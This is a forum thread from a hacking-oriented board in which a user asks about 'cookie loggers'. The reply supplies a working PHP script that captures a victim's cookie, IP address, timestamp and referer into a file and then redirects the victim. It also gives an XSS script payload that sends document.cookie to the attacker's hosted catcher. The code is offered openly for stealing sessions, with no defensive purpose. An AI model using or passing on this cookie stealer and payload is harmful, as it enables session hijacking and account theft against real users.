1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

cookie logger

Discussion in 'Social Networking Sites' started by Finnishhacker, Feb 11, 2012.

  1. Finnishhacker

    Finnishhacker Junior Member

    Joined:
    Dec 25, 2011
    Messages:
    106
    Likes Received:
    9
    Anyone has knowledge about cookie loggers ??
     
  2. tsree

    tsree Newbie

    Joined:
    Sep 24, 2011
    Messages:
    32
    Likes Received:
    2
    What are you meant by cookie logger?
     
  3. Finnishhacker

    Finnishhacker Junior Member

    Joined:
    Dec 25, 2011
    Messages:
    106
    Likes Received:
    9

    if you dont even know what it is dont bother asking.....search on google. I need someone who knows about the topic :D
     
  4. No.RuleZ

    No.RuleZ Elite Member

    Joined:
    Jul 23, 2010
    Messages:
    1,732
    Likes Received:
    358
    fb cookie logger?
     
  5. dgruergerugerhiye

    dgruergerugerhiye BANNED BANNED Jr. VIP Premium Member

    Joined:
    Nov 4, 2010
    Messages:
    305
    Likes Received:
    450
    I found this is 2 seconds from googling...

    PHP:
    <?php 
    $cookie 
    $_GET['c']; //This obtains a value of variable c in url passed by GET method of HTTP and stores it in $cookie  

    $ip getenv ('REMOTE_ADDR'); // Gets the value of an environment variable which denotes the IP of client and stores it in $ip  

    $date date ("j F, Y, g:i a"); //Records the Date and Time of capture 

    $referer getenv ('HTTP_REFERER'); //Gets the value of an environment variable which denotes the site which redirected to your cookie catcher and stores it in $referer 

    $fp fopen ('cookies.html','a'); //opening a file cookies.html in append mode in which details will be stored 

    fwrite ($fp'Cookie :'.$cookie.'<br/> IP :'.$ip.'<br/> Date and Time :'.$date.'<br/> Referer : '.$referer); //passing the reference of file cookies.html and passing the rest of the details we obtained 

    fclose ($fp); //closing the file reference  

    header ('Location: http://www.siteYouWantToRedirectTheVictimTo.com/'); //Redirecting the client back to page you wish  

    ?>


    Now all you have to ensure is that you force the client to send the cookie in a variable called c over the GET method ...

    For example if you find an XSS , you may inject this javascript which will will do the above

    HTML:
    <script>document.location="www.thePlaceWhereYouUploadedYourCookieCatcher.php?c=" + document.cookie</script>
     
    • Thanks Thanks x 1